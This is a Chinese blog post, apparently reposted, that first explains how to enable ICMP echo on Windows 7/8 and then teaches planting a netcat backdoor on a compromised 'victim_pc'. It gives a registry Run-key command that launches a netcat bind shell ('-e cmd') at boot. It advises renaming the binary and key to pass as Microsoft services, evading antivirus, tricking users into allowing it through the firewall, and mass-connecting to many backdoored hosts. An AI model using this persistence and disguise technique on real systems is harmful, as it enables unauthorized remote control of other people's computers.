ping不通win7、8解决方法以及nc后门的制作
默認(rèn)情況下win7、8是不能被ping通的,出于安全考慮不允許外部主機(jī)對(duì)其進(jìn)行Ping測試。(關(guān)閉防火墻不能解決此問題!!!)
解決方法:允許ICMP回顯,設(shè)置如下:
Firewall.cpl——高級(jí)設(shè)置——入站規(guī)則——文件和打印機(jī)共享(回顯請(qǐng)求 -ICMPv4-In),win7下有兩個(gè)(域,公用專用),win8下有三個(gè)(域,公用,專用),右擊啟用規(guī)則即可,IPV6亦然,個(gè)人測試過程中發(fā)現(xiàn)其實(shí)只要啟用公用這一項(xiàng)就Ok了。下面分別是win7和win8的firewall。
nc這把瑞士×××的確是屢試不爽,唯一可惜的就是會(huì)被殺軟查殺,只能自己做免殺,還好源代碼是公開的,懂編程的話可以做源碼級(jí)別的免殺,下面說下利用nc在內(nèi)網(wǎng)做不會(huì)被殺軟查殺的后門,并且無視遠(yuǎn)程pc用戶名密碼的修改,連接類型為正向主動(dòng)型連接。假設(shè)通過各種溢出漏洞等拿到了Victim_pc的shell,當(dāng)然nc需要傳過去(這步有點(diǎn)問題,假設(shè)本地開了ftp,遠(yuǎn)程下載nc后會(huì)被360查殺,始終想不出有什么好的方法可以下載文件到victim_pc而不被查殺,除了做免殺,求高手指導(dǎo)),然后其實(shí)就是開啟一個(gè)nc監(jiān)聽程序并返回shell,當(dāng)然這邊需要做到開機(jī)啟動(dòng),比較好的方法就是添加到注冊(cè)表啟動(dòng)項(xiàng)里面,reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v“鍵值名稱” /d “nc –d –L –p port –e cmd /f“,這樣就添加到開機(jī)啟動(dòng)項(xiàng)里面了,當(dāng)然此處也需要一點(diǎn)點(diǎn)社工的思想,比如nc的改名,鍵值名稱的改名,你需要寫的比較像,因?yàn)?/span>msconfig以及任務(wù)管理器會(huì)顯示。
這邊我只是把nc改成了winsearch,當(dāng)然完全可以改成能欺騙別人的名字,比如一些MS服務(wù)名啦等等。這樣重啟后victim_pc就會(huì)一直監(jiān)聽本地端口,本地就可以連接其ip、port得到其shell,這種后門的好處就是無視殺毒軟件的查殺以及用戶名密碼的修改,原因沒有過多深入,覺得應(yīng)該是nc在殺軟前啟動(dòng)的或者至少在殺軟監(jiān)視之前nc已經(jīng)做好了監(jiān)聽工作。這邊也會(huì)出現(xiàn)一個(gè)問題,就是啟動(dòng)項(xiàng)第一次運(yùn)行nc工具的時(shí)候防火墻會(huì)彈出提示,是否允許通過,如果你把名字改的像一點(diǎn),一般別人是會(huì)點(diǎn)擊允許的。此外,需要一提的就是假設(shè)victim_pc的OS為win7,本地ping不通,但是nc是可以穿透的,無視防火墻的限制。
也許有人會(huì)有疑問,既然得到shell后下載本地nc時(shí)被查殺,又如何做后續(xù)的步驟呢,亦或者nc已經(jīng)做好了免殺,可以下載到遠(yuǎn)程pc,那不是隨便了么。誠然,這的確是矛盾的地方,所以我說的只是一種思路,不用太鉆牛角尖。另外可能會(huì)出現(xiàn)的一種情況就是,nc做好免殺后在當(dāng)時(shí)可能是有用的,可是不能保證以后也可以免殺,必須相信殺軟的更新速度和技術(shù),所以這種方法還是有一定的參考價(jià)值的。
當(dāng)然這邊講的情況是內(nèi)網(wǎng),其實(shí)外網(wǎng)也一樣,只是你需要搜集對(duì)方的ip地址罷了,如果對(duì)方在內(nèi)網(wǎng),還需要做端口轉(zhuǎn)發(fā)。在內(nèi)網(wǎng)中還有個(gè)好處就是如果你給好多臺(tái)pc都種了此nc后門,那么你完全可以自己寫一個(gè)批處理程序來進(jìn)行連接,程序我就不寫了,思路如下:先掃描存活主機(jī),當(dāng)然需要強(qiáng)力一點(diǎn)的掃描軟件,首推nmap,防止win7\8 ping不通的情況,接著開啟n個(gè)nc連接存活主機(jī)。
另外這邊講的是正向連接型,有些情況下會(huì)被防火墻攔截,當(dāng)然最好的就是反彈型的后門,其實(shí)原理也一樣,本地nc監(jiān)聽,victim_pc主動(dòng)連接,也可以做成開機(jī)啟動(dòng)項(xiàng)的形式,只不過需要循環(huán)連接本地主機(jī)(比如間隔時(shí)間為1min),而本地需要連接遠(yuǎn)端的時(shí)候開啟監(jiān)聽,有點(diǎn)類似于灰鴿子反彈型***的制作思想,其實(shí)遠(yuǎn)控工具無非就是把一些功能都集成到一起罷了。
此外不得不提的就是nc強(qiáng)大的功能,可以收發(fā)郵件,可以端口轉(zhuǎn)發(fā)做中繼,可以ftp,可以發(fā)送接收文件,還可以掃描ip、port,簡直是無所不能,不得不注意的是它的大小僅僅只有60K,真不愧是瑞士×××。
轉(zhuǎn)載于:https://blog.51cto.com/lunachy/1246435
總結(jié)
以上是生活随笔為你收集整理的ping不通win7、8解决方法以及nc后门的制作的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 小乔大招叫什么 王者荣耀小乔大招介绍
- 下一篇: 有效沟通 02